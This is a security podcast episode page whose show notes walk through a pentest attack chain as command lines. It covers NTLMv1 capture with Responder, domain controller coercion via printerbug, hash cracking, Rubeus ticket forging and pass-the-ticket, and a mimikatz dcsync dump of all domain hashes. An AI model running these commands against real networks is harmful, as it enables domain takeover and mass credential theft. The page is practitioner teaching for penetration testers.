7MS: #559: Tales of Pentest Pwnage - Part 46
7 Minute Security10 Feb 2023

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

Change the Responder.conf file like so:

; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

Run Responder with --disable-ess flag

sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

Use printerbug to coax authentication from a domain controller:

sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

Convert hash to make it easier to crack!

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

Now you can do a Rubeus asktgt with the DC hash:

rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

rubeus.exe ptt /ticket:TICKET GOES HERE

Use mimikatz to dump all hashes!

mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

Avsnitt(683)

7MS #242: Bye Bye Dream Job - Part 4

7MS #242: Bye Bye Dream Job - Part 4

We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes): Webapp pentest tool bake-off In the next week I'll be evaluating the following for a more general/automatic Webapp scans: Netsparker HP WebInspect Qualys AppSpider SIEM comparison We're looking at several tools to do both on-prem and managed SIEM solutions. If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!

26 Jan 201710min

7MS #241: Bye Bye Dream Job - Part 3

7MS #241: Bye Bye Dream Job - Part 3

Show notes are here

19 Jan 201713min

7MS #240: Bye Bye Dream Job - Part 2

7MS #240: Bye Bye Dream Job - Part 2

Show notes are here.

12 Jan 201712min

7MS #239: Bye Bye Dream Job - Part 1

7MS #239: Bye Bye Dream Job - Part 1

Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1

5 Jan 20179min

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary

30 Nov 20168min

7MS #237: Network Monitoring 101 - Part 1: Nessus

7MS #237: Network Monitoring 101 - Part 1: Nessus

Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus

23 Nov 20168min

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central

17 Nov 201611min

7MS #235: Pwning Billy Madison

7MS #235: Pwning Billy Madison

Show notes: https://7ms.us/7ms-235-pwning-billy-madison

10 Nov 201610min

Populärt inom Politik & nyheter

p3-krim
svd-dokumentara-berattelser-2
rss-krimstad
flashback-forever
rss-vad-fan-hande
aftonbladet-daily
rss-viva-fotboll
olyckan-inifran
rss-sanning-konsekvens
svenska-fall
krimmagasinet
fordomspodden
motiv
rss-expressen-dok
rss-frandfors-horna
dagens-eko
blenda-2
svd-nyhetsartiklar
spar
spotlight